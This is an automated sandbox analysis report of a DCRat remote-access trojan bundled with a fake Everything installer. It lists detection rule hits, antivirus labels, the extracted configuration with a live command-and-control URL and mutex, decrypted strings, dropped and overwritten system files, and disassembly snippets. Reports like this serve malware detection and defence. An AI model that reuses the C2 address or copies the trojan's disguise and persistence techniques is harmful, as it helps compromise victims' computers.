                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8584, ProcessName: svchost.exe

                                Data Obfuscation

                                barindex
                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet/containerwebruntime.exe", ParentImage: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, ParentProcessId: 2300, ParentProcessName: containerwebruntime.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline", ProcessId: 4696, ProcessName: csc.exe
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-01-08T17:12:56.629250+010020480951A Network Trojan was detected192.168.2.549853104.21.112.180TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: wxl1r0lntg.exeAvira: detected
                                Source: C:\Recovery\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Program Files\Everything\Everything.exeAvira: detection malicious, Label: HEUR/AGEN.1357628
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Users\user\AppData\Local\Temp\KDhudFNWvk.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: 0000000E.00000002.2626614280.000000001267C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads", "MUTEX": "DCR_MUTEX-D9v2NJXg7O8XLMbKG3IO", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeReversingLabs: Detection: 83%
                                Source: C:\Recovery\RuntimeBroker.exeReversingLabs: Detection: 83%
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeReversingLabs: Detection: 68%
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeReversingLabs: Detection: 83%
                                Source: C:\Users\user\Desktop\ANcNpKUT.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\GEAmOcnc.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\fXnruzVd.logReversingLabs: Detection: 50%
                                Source: C:\Users\user\Desktop\otdhyUEt.logReversingLabs: Detection: 37%
                                Source: C:\Users\user\Desktop\pGGHecbL.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\phhpjhAr.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\qeIxFhOl.logReversingLabs: Detection: 50%
                                Source: C:\Users\user\Desktop\utYFHYqz.logReversingLabs: Detection: 37%
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeReversingLabs: Detection: 83%
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeReversingLabs: Detection: 83%
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeReversingLabs: Detection: 83%
                                Source: wxl1r0lntg.exeReversingLabs: Detection: 73%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                Source: C:\Recovery\RuntimeBroker.exeJoe Sandbox ML: detected
                                Source: C:\Program Files\Everything\Everything.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeJoe Sandbox ML: detected
                                Source: wxl1r0lntg.exeJoe Sandbox ML: detected
                                Source: 0000000E.00000002.2626614280.000000001267C000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"True","_2":"True","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
                                Source: 0000000E.00000002.2626614280.000000001267C000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-D9v2NJXg7O8XLMbKG3IO","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                Source: 0000000E.00000002.2626614280.000000001267C000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://838596cm.nyafka.top/","lineLongpolllinuxFlowercentraluploads"]]
                                Source: wxl1r0lntg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeWindow detected: I &AgreeCancelEverything 1.4.1.1024 (x64) Setup Everything 1.4.1.1024 (x64) SetupLicense AgreementPlease review the license terms before installing Everything.Press Page Down to see the rest of the agreement.EverythingCopyright (c) 2023 voidtoolsPermission is hereby granted free of charge to any person obtaining a copy of this software and associated documentation files (the "Software") to deal in the Software without restriction including without limitation the rights to use copy modify merge publish distribute sublicense and/or sell copies of the Software and to permit persons to whom the Software is furnished to do so subject to the following conditions:The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND EXPRESS OR IMPLIED INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM DAMAGES OR OTHER LIABILITY WHETHER IN AN ACTION OF CONTRACT TORT OR OTHERWISE ARISING FROM OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.Perl-Compatible Regular ExpressionsCopyright (c) 1997-2012 University of CambridgeRedistribution and use in source and binary forms with or without modification are permitted provided that the following conditions are met:* Redistributions of source code must retain the above copyright notice this list of conditions and the following disclaimer.* Redistributions in binary form must reproduce the above copyright notice this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.* Neither the name of the University of Cambridge nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT INDIRECT INCIDENTAL SPECIAL EXEMPLARY OR CONSEQUENTIAL DAMAGES (INCLUDING BUT NOT LIMITED TO PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE DATA OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY WHETHER IN CONTRACT STRICT LIABILITY OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.If you accept the terms of the agreement click I Agree to continue. You must accept the agreement to install Everything.
                                Source: C:\Windows\System32\conhost.exeWindow detected: I &AgreeCancelEverything 1.4.1.1024 (x64) Setup Everything 1.4.1.1024 (x64) SetupLicense AgreementPlease review the license terms before installing Everything.Press Page Down to see the rest of the agreement.EverythingCopyright (c) 2023 voidtoolsPermission is hereby granted free of charge to any person obtaining a copy of this software and associated documentation files (the "Software") to deal in the Software without restriction including without limitation the rights to use copy modify merge publish distribute sublicense and/or sell copies of the Software and to permit persons to whom the Software is furnished to do so subject to the following conditions:The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND EXPRESS OR IMPLIED INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM DAMAGES OR OTHER LIABILITY WHETHER IN AN ACTION OF CONTRACT TORT OR OTHERWISE ARISING FROM OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.Perl-Compatible Regular ExpressionsCopyright (c) 1997-2012 University of CambridgeRedistribution and use in source and binary forms with or without modification are permitted provided that the following conditions are met:* Redistributions of source code must retain the above copyright notice this list of conditions and the following disclaimer.* Redistributions in binary form must reproduce the above copyright notice this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.* Neither the name of the University of Cambridge nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT INDIRECT INCIDENTAL SPECIAL EXEMPLARY OR CONSEQUENTIAL DAMAGES (INCLUDING BUT NOT LIMITED TO PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE DATA OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY WHETHER IN CONTRACT STRICT LIABILITY OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.If you accept the terms of the agreement click I Agree to continue. You must accept the agreement to install Everything.
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\EverythingJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\Everything\Everything.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\Everything\Changes.txtJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\Everything\License.txtJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\Everything\Everything.lngJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\Everything\Uninstall.exeJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeDirectory created: C:\Program Files\Everything\Everything.ini.tmpJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDirectory created: c:\Program Files\Everything\CSCA17046CBF8B64A188168A4AB380809F.TMP
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDirectory created: c:\Program Files\Everything\Everything.exe
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EverythingJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeFile created: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\License.txtJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeFile created: C:\Program Files\Everything\License.txtJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dllJump to behavior
                                Source: wxl1r0lntg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: wxl1r0lntg.exe, 00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmp, sqls211.exe, 00000002.00000000.2037410745.0000000000CF3000.00000002.00000001.01000000.00000006.sdmp, sqls211.exe, 00000002.00000003.2041272436.00000000064C1000.00000004.00000020.00020000.00000000.sdmp, sqls211.exe, 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmp, sqls211.exe, 00000002.00000003.2043048725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.pdb source: containerwebruntime.exe, 0000000E.00000002.2445359948.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: ntkrnlmp.pdb source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\pgfcrwpp\pgfcrwpp.pdb source: containerwebruntime.exe, 0000000E.00000002.2445359948.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\dcil424w\dcil424w.pdb source: containerwebruntime.exe, 0000000E.00000002.2445359948.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: winload_prod.pdb0 source: Everything.exe, 00000014.00000003.2341196360.00000000056F0000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2342771150.0000000005881000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winload_prod.pdb source: Everything.exe, 00000014.00000003.2341196360.00000000056F0000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2342771150.0000000005881000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.0000000005D51000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ntkrnlmp.pdbl source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ntkrnlmp.pdb, source: Everything.exe, 00000014.00000003.2331201128.0000000005D51000.00000004.00000020.00020000.00000000.sdmp

                                Spreading

                                barindex
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Program Files\Everything\Everything.exeFile opened: z:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: x:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: v:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: t:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: r:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: p:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: n:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: l:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: j:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: h:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: f:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: b:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: y:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: w:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: u:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: s:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: q:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: o:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: m:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: k:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: i:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: g:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: e:
                                Source: C:\Windows\System32\svchost.exeFile opened: c:
                                Source: C:\Program Files\Everything\Everything.exeFile opened: a:
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D4C0E00 RegisterDeviceNotificationA,GetLastError,CloseHandle,GetLastError,RegisterDeviceNotificationA,GetLastError,GetLastError,6_2_00007FF63D4C0E00
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_00CCA69B
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_00CDC220
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CEB348 FindFirstFileExA,2_2_00CEB348
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405D74
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_0040699E FindFirstFileW,FindClose,3_2_0040699E
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_0040290B FindFirstFileW,3_2_0040290B
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D547710 FindFirstFileW,6_2_00007FF63D547710
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D54A0C0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,6_2_00007FF63D54A0C0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D549FA0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,6_2_00007FF63D549FA0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C8A0C0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,7_2_00007FF728C8A0C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C87710 FindFirstFileW,7_2_00007FF728C87710
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C89FA0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,7_2_00007FF728C89FA0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C8A0C0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,10_2_00007FF728C8A0C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C87710 FindFirstFileW,10_2_00007FF728C87710
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C89FA0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,10_2_00007FF728C89FA0
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\user\AppDataJump to behavior

                                Software Vulnerabilities

                                barindex
                                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then add rcx, 01h6_2_00007FF63D47B7B0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rdx+r8]6_2_00007FF63D53B440
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]6_2_00007FF63D499EB0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then movsxd rdx, qword ptr [rbx+74h]6_2_00007FF63D5F4E40
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then movzx r8d, word ptr [r9]6_2_00007FF63D5E6720
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rbx]6_2_00007FF63D4DDF30
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then test al, al6_2_00007FF63D4B56C0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then test al, al6_2_00007FF63D4B56C0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov r8d, 00000001h6_2_00007FF63D4BDDA0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [rbx]6_2_00007FF63D4CE550
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then test al, al6_2_00007FF63D555E20
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [r10]6_2_00007FF63D5218A0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r8]6_2_00007FF63D5218A0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r9]6_2_00007FF63D4D3850
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rdi+000000A8h]6_2_00007FF63D4D3850
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [r8]6_2_00007FF63D4D3850
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then lea rcx, qword ptr [rsp+000002A0h]6_2_00007FF63D542840
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then cmp rcx, 0000000000000100h6_2_00007FF63D48B860
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov qword ptr [rcx], rbx6_2_00007FF63D48B860
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rax]6_2_00007FF63D48B860
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov qword ptr [rcx], rdi6_2_00007FF63D48B860
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [r9+rdx]6_2_00007FF63D53F850
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then add rcx, 01h6_2_00007FF63D5E6920
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [rsp+r8+000001D0h]6_2_00007FF63D4C7920
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rdi+20h]6_2_00007FF63D478790
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then test r10d, r10d6_2_00007FF63D47DF80
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rsi, qword ptr [r15]6_2_00007FF63D4ADF60
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [r8]6_2_00007FF63D602F50
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000178h]6_2_00007FF63D47E800
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000001C8h]6_2_00007FF63D47E800
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000218h]6_2_00007FF63D47E800
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000268h]6_2_00007FF63D47E800
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000150h]6_2_00007FF63D47E800
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000001A0h]6_2_00007FF63D47E800
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000001F0h]6_2_00007FF63D47E800
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000240h]6_2_00007FF63D47E800
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000290h]6_2_00007FF63D47E800
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000002B8h]6_2_00007FF63D47E800
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov r9, qword ptr [r11+08h]6_2_00007FF63D478830
